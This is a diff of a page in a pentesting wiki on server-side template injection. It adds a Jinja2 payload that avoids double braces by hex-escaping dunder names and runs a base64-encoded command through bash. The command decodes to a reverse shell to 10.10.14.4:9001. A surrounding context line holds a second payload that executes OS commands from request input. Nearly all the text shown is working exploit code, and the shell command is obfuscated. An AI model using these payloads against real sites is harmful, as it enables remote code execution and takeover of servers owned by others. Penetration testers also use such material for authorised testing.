GitBook: [master] one page modified

Author: carlospolop

pentesting-web/ssti-server-side-template-injection/README.md

@@ -606,6 +606,12 @@ Simply modification of payload to clean up output and facilitate command input \
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 ```
 
+**Exploit SSTI without "{{" and "}}"**
+
+```python
+{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
+```
+
 **Exploit the SSTI by writing an evil config file.**
 
 ```python